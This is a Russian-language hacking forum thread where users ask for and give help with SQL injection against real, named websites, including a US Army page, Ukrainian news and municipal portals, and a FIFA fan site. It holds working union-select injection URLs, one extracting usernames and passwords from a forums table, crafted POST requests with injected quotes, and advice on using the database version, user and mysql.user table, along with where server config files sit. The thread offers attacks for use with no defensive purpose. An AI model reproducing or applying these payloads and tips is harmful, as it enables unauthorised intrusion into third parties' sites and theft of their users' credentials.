jokester короче сделал так: www.site.ru/index.php?id=-1,2,char(105, 109),4,5+from+users/* то мне выводит IM хотя я сам защифровал это слово в char AES_DECRYPT не помогает ( что можно еще сделать*?
2 ~Taxa~ Slip прав без ссылки трудно советовать если отправишь ему отпишите что было,а то я переживаю
Народ подскажите плиз что даёт к примеру это -http://www4.army.mil/otf/story.php?id=-56/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/* 4.1.22-log otf_web_user@localhost otf интересует зачем пишут вот это - 4.1.22-log otf_web_user@localhost otf и как это можно использавать ? Спасибо !
1. Версия. Если >5 , то хэк упрощается системной информацией о структуре бд. 2. Пользователь. От какого пользователя в данный момент работает бд. Так же помогает вытягивать информацию из mysq.user с помощью "where". 3. Название БД (насколько я понял своим телепатизмом). Опять же если ветка >5, упрощает взлом. Так же используется с "where".
подскажите пожалуйста! Нашел скулю http://www.poetryclub.com.ua/getpoem.php?id=55117+order+by+5/* но при попытке подбора количества полей выплевывает ------------------------ Database error: Invalid SQL: UPDATE `users_poems` SET visited2 = visited2 + 1 WHERE id = 55117 order by 5/* AND confirmed=1 MySQL Error: 1054 (Unknown column '5' in 'order clause') Session halted. ----------------------- пробовал уже и union select(дошел до 30)и order by везде одно и тоже Подскажите что я делаю не так. заренее Спасибо
Люди а вы неподскажите, где можна найти статью где описывается где вообще в апаче лежат всякие конфиги, например к phpMyAdmin, webmail, squirrelmail и тд. ?
Апач конфиг в папке : \usr\local\Apache\conf файл httpd.conf phpMyadmin: \home\localhost\admin\mysql\phpmyadmin\ config.inc.php mysql: \usr\local\mysql5\my.ini
Добрый вечер! нашел скулю вида: ----------------------- http://art.dn.ua/news_one.php?news_id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* ----------------------- citysite 4.0.16 [email protected] ------------------------ но никак не могу подобрать названия таблиц. Кому не трудно подскажите. Всем откликнувшимся СПАСИБО!
да нет, это просто названия типов mysql и mysql5... mysql5 хеши поддерживаются начиная с mysql 4.1 если хочешь работать со старыми хешами (mysql) то мускульный демон надо запускать с параметром --old-passwords, при этом mysql5 хеши как понимаешь никуда не деваются, а остаются в mysql.user
http://fifa08.in/?site=1' http://fifa08.in/index.php?site=1' http://fifa08.in/printview.php?board=3&topic=1' http://fifa08.in/index.php?site=gallery&picID=1' http://fifa08.in/index.php?site=forum_topic&topic=1'&page=1&sort=&type=DESC POST'om POST /comments.php HTTP/1.1 Host: fifa08.in Content-Type: application/x-www-form-urlencoded Content-Length: 98 name=1&mail=1&url=1&captcha=1&captcha_hash='&referer=1&parentID=1&type=1&ip=1&savevisitorcomment=1 POST /index.php?site=register HTTP/1.1 Host: fifa08.in Content-Type: application/x-www-form-urlencoded Content-Length: 74 nickname=1&username=1&pwd1=1&pwd2=1&mail=1&captcha=1&captcha_hash='&save=1 Скажите как вытянуть отсюда что-нибудь!!!!???
Только учусь! ------------------------------ нашел скулю ------------------------------ http://donetsk.life.dn.ua/ Комунальный портал города Донецка. ------------------------------- 5.0.37-log life life@localhost ------------------------------- http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/from/**/forums_auth/**/limit/**/1,1/* ------------------------------- есть интересные таблицы: (но я их не перебирал) board_admin_comment f1 f1_bodies f2 f2_bodies f3 f3_bodies f4 f4_bodies f5 f5_bodies forums forums_auth forums_forum2group forums_groups forums_moderators forums_user2group gal_user guide mail_archieve maillist maillist_users poll_poll poll_vote prob --------------------- сколько ни пробовал не получается делать запросы ттипа: from+information_schema.columns+where+teble_name='user'(в этом случае 'forums_auth')+limit,1,1/* приходится перебирать ручками ПОДСКАЖИТЕ может что не так делаю?